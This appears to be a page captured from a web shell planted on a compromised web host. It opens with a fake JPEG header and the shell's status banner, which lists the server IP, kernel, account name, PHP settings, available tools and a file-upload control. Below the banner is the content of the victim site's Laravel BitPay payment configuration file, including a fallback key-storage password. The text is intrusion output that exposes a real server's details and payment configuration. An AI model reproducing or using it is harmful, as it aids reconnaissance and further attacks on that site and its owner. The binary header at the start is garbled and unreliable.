����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 52.14.93.7 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/bofirmacademy.com/config/ |
Upload File : |
<?php return [ /* * This is the full path and name for the private key. * The default value is /tmp/laravel-bitpay.pri */ 'private_key' => env('BITPAY_PRIVATE_KEY_PATH', base_path('laravel-bitpay.pri')), /* * This is the full path and name for the public key. * The default value isbase_path('laravel-bitpay.pub ) */ 'public_key' => env('BITPAY_PUBLIC_KEY_PATH', base_path('laravel-bitpay.pub')), /* * Specifies using the Live Bitcoin network or * Test Bitcoin network: livenet or testnet. * * The default is livenet */ 'network' => get_option('bitpay_mode', 'testnet'), /* * The key_storage option allows you to specify a class for persisting and retrieving keys. * * By default this uses the Bitpay\Storage\EncryptedFilesystemStorage class. */ 'key_storage' => \BitPayKeyUtils\Storage\EncryptedFilesystemStorage::class, /* * This is the password used to encrypt and decrypt keys on the filesystem. */ 'key_storage_password' => env('BITPAY_KEY_STORAGE_PASSWORD', 'RandomPasswordForEncryption'), /* * BitPay Token */ 'merchant_token' => get_option('bitpay_key', null), ];